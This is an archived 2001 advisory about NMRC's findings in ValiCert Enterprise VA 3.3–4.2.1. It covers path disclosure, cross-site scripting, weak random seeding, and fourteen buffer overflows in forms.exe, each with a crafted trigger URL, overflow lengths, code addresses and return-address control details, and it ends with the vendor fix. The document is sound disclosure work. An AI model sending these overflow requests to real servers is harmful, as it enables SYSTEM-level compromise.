5th Dec 2001 [SBWID-4896]
COMMAND
ValiCert
SYSTEMS AFFECTED
ValiCert Enterprise VA v3.3 - 4.2.1 releases
PROBLEM
NMRC people (Cyberiad & Phuzzy L0gic) found multiple
vulnerabilities regarding ValiCert, which provides validity status
responses for X.509 certificates. (multiple buffer overflows,
cross-scripting problem, path disclosure, random key generation
problem)
Great job, guys !
Synopsis
--------
Valicert Enterprise VA provides validity status responses for X.509
certificates and supports the following verification mechanisms:
- Certificate Revocation Lists
- CRL Distribution Points
- Online Certificate Status Protocol
The Enterprise VA product architecture consists of:
Enterprise VA Administration Server for performing management
activities Enterprise VA Host Server for processing validation requests
VA API defining custom extensions to Enterprise VA.
Numerous vulnerabilities have been located in a CGI script used by the
Enterprise VA Administration Server ranging from information gathering
to system compromise.
[Taken from www.valicert.com] - \"ValiCert provides secure solutions
for paperless e-business. Customers across the globe use our products
and services to help migrate costly or inefficient business processes
to the Internet, while maintaining the highest degree of trust and
security.\"
Tested configuration
--------------------
Testing was done with the following configurations:
Microsoft Windows NT Server 4.0
Microsoft Windows NT Service Pack 6a
The Solaris version was also tested and found to be vulnerable to most
of the overflow issues and one unique issue listed as issue #3.
The vendor, ValiCert - www.valicert.com, has confirmed that all of the
above named versions and operating systems are vulnerable.
Issue #1 - Path Disclosure
--------------------------
A path disclosure issue exists in the forms.exe CGI script used by
Valicert when an new extension is added. Valicert can be extended by
adding new extensions which are processed by custom policies. The
following URL adds the extension, ldp:
http://computer:13333/cgi-bin/forms.exe?extension=ldp&command=Add+Extension
When an invalid extension, such as foobar, is provided in the following
URL:
http://computer:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
the server returns an error page with the following text:
Following Input/Configuration file is NOT FOUND in the required location.
FILENAME = foobar
LOCATION = D:\\Program Files\\ValiCert\\EnterpriseVA\\entserv
Make sure the file is present in the above location and try again.
Revealing the path to the Valicert installation.
Issue #2 - Cross Site Scripting Problem
----------------------------------------
Due to the lack of input validation and filtering, a cross-site
scripting issue exists in the certificate creation of the Valicert
Administrative interface. A user creating a certificate can insert HTML
code into the descriptive fields. If the certificate is viewed through
the Valicert Administrative server, the HTML is interpreted and any
scripting is executed. As an example, HTML code can be inserted into
the organizational name which is interpreted upon certificate display.
In doing so, a dialog box could be displayed, prompting the operator to
enter a password. Though it is not possible to access unauthorized
resources, it could be used to engineer an individual administering the
Valicert server into entering sensitive data.
If the Administrative server is protected with a password, only those
individuals with the proper username/password can create such a
certificate containing malicious data in the fields.
Issue #3 - Random Key Generation Issue
--------------------------------------
Valicert generates \'random\' tokens for communication with Hardware
Security Modules (securely stores digital certificates) using the C
rand() function call. Furthermore, the C rand() function is seeded
using local system time. Aside from the fact that the value is in
itself predictible, system clock ticks are generally not finite enough
to be used as a good, sole source of entropy. Seeding using local
system time will guarantee that the values outputted will linearly
increase.
Lastly, if the \'/dev/urandom\' device exists, Valicert will use it by
default for certificate generation. Although for most purposes the
\'/dev/urandom\' device is sufficiently safe, it does not perform
blocking when its entropy pool is low. Taking into consideration that
within a PKI, non-repudiation (in the business, not the mathematical
sense) is paramount, the behavior of the \'/dev/random\' device is much
more favourable.
Issue #4 - Multiple Buffer Overflows
------------------------------------
Multiple buffer overflows exist in the CGI script, forms.exe, which is
used by the Valicert Enterprise VA Administration Server for management
activities. By default the Administration Server listens on TCP port
13333 and can be configured to require a username and password for
access. Using the Apache v1.3.6 web server for Win32, the
Administration Server allows an operator to use a Web browser to:
configure the Enterprise VA Host server
start/stop the Enterprise VA Host server
request product keys and licenses
create key pairs
add certificates
add or modify certificate stores
add and configure extensions
view logs
In total, fourteen (14) independent and exploitable overflows in
parameters to forms.exe have been identified which allow for code to be
executed with SYSTEM privileges. If the Administrative Server has been
configured to require a username and password for access, the attacker
requires the correct username and password to launch these attacks.
Mode Overflow:
-------------
The following URL is used to switch to server configuration mode,
http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
Providing a mode string of 265 bytes overflows a buffer during a copy
located at 0x0040acf8 in forms.exe and overwrites the return address
which is popped off the stack at the subroutine return located at
0x0040adf9.
http://localhost:13333/cgi-bin/forms.exe?forms.exe?command=change_index_mode&mode={A x 265}
Analysis of the code and stack contents reveals that the unchecked
buffer is 256 bytes long, followed by two pointers or 32-bit integers
on the stack and then the return address.
Certificate_File Overflow:
-------------------------
The following URL is used to create a Microsoft-type certificate.
Providing a Certificate_Files parameter of 1028 bytes overflows a
buffer during a copy located at 0x0040599a in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x00405cb8.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?CertServerSelection
=Microsoft&Certificate_Type=SHARE&Certificate_Files
={A x 1028}&command=Submit+Certificate+Type
Analysis of the code and stack contents reveals that the unchecked
buffer is 1024 bytes long, immediately followed by the return address
on the stack.
useExpiredCRLs Overflow:
------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the useExpiredCRLs parameter a value of 1288 bytes overflows
a buffer during a copy located at 0x0040b9dc in forms.exe and
overwrites the return address which is popped off the stack at the
subroutine return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs={A x 1288}&maxOCSPValidityPeriod
=0&command=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
listenLength Overflow:
---------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the listenLength parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b54e in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength={A x 1288}&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
maxThread Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxThread parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b5f3 in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread={A x 1288}&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
maxConnPerSite Overflow:
-----------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxConnPerSite parameter a value of 1288 bytes overflows
a buffer during a copy located at 0x0040b67f in forms.exe and
overwrites the return address which is popped off the stack at the
subroutine return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite={A x 1288}&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
maxMsgLen Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxMsgLen parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b70b in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
={A x 1288}&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
exitTime Overflow:
-----------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the exitTime parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b797 in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime={A x 1288}&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
blockTime Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the blockTime parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b823 in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime={A x 1288}&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
nextUpdatePeriod Overflow:
-------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the blockTime parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b8af in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod={A x 1288}&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
buildLocal Overflow:
-------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the buildLocal parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b950 in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal={A x 1288}&useSoftwareSigning
=Software&sslSigningType=Software&sslServerHost=&sslCertFile
=sslCert.cert&sslPrivateKey=ssl.privkey&useExpiredCRLs
=0&maxOCSPValidityPeriod=0&command=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
maxOCSPValidityPeriod Overflow:
------------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxOCSPValidityPeriod parameter a value of 1288 bytes
overflows a buffer during a copy located at 0x0040ba68 in forms.exe and
overwrites the return address which is popped off the stack at the
subroutine return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod={A x 1288}&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
extension Overflows:
-------------------
Valicert can be extended by adding new extensions which are processed
by custom policies. Attempting to add an extension with a file name of
995 bytes in length overflows a buffer at an sprintf located at
0x00417A9B in forms.exe while the error message to be displayed to the
client is constructed. The long string overwrites the return address
which is popped off the stack at the subroutine return located at
0x00417AD0.
http://localhost:13333/cgi-bin/forms.exe?extension={A x 995}&command=Add+Extension
Analysis of the code and stack contents reveals that the subroutine
starting at 0x0040FEC0 makes many unchecked copies while converting the
extension parameter to an absolute filename (i.e. D:\\Program
Files\\ValiCert\\EnterpriseVA\\entserv\\AAA..) and checking for
existence, etc. During the course of these copies, terminating null\'s
in (assumed) fixed-length buffers containing the filename are
overwritten. As a result, the absolute filename passed to the offending
sprintf call is much longer than expected. A solution to the sprintf
problem will still leave the overflows in 0x0040FEC0, which may
possible be exploited.
Private Key Generation Overflow:
-------------------------------
The operator can use the Administrative Server to generate new private
keys for SSL communications or use in signing OCSP responses. An
overflow exists in the processing of requests for the generation of
private keys. The following is one example of how this overflow can be
triggered by requesting a new private key for SSL communications. Long
strings in all other parameter values other than the:
country_name
gen_self_signed_cert
command
keytype
parameters will also trigger the overflow and overwrite a return
address on the stack. The following URL overwrites the return address
with the opt_company_name value (xxxx).
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?country_name=XX&state_name
=XX&locality_name=XX&org_name=XX&org_unit_name=X&common_name=X&email_address
=X@X&challenge_password={A x 833}&opt_company_name=xxxx&gen_self_signed_cert
=1&command=Submit+SW+Certificate+Request&keytype=BASIC%3BKEY_1
Analysis of the code and stack contents reveals that the parameters:
country_name
state_name
locality_name
org_name
org_unit_name
common_name
email_address
challenge_password
opt_company_name
are parsed and then reformatted using an sprintf statement called at
0x402C2E8. The destination buffer is too small to contain the results
and overflows, overwriting the return address with the value in the
opt_company_name parameter. The corrupted return address is popped off
the stack at 0x0040C58A. The following set of constraints must be met
for the overflow to occur:
a) The country_name parameter must be exactly two bytes long otherwise
the offending sprintf call is never reached.
b) The email_address parameter must be of the form string@string
otherwise the offending sprintf call is never reached.
c) The total length of all parameters must be 864 bytes for the result
from sprintf to overwrite the return address. Longer lengths will
cause the buffer overflow but will also overwrite parameters passed
to the subroutine, causing the CGI script to crash before the
subroutine terminates and pops off the corrupted return address.
SOLUTION
NMRC offers the following suggestions to prevent these vulnerabilities
from being exploited:
If remote web administration is required, do so over an SSL connection
to prevent the admin user id and password from being captured.
Otherwise, blocking TCP port 13333, which is used for remote admin
would prevent the overflows from being sucessful.
Accordingly with ValiCert
(http://www.valicert.com/support/security_advisory_eva.html) :
All these consideration have been fixed in EVA 4.2.2 which is currently
available and can be obtained by contact support@valicert.com.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
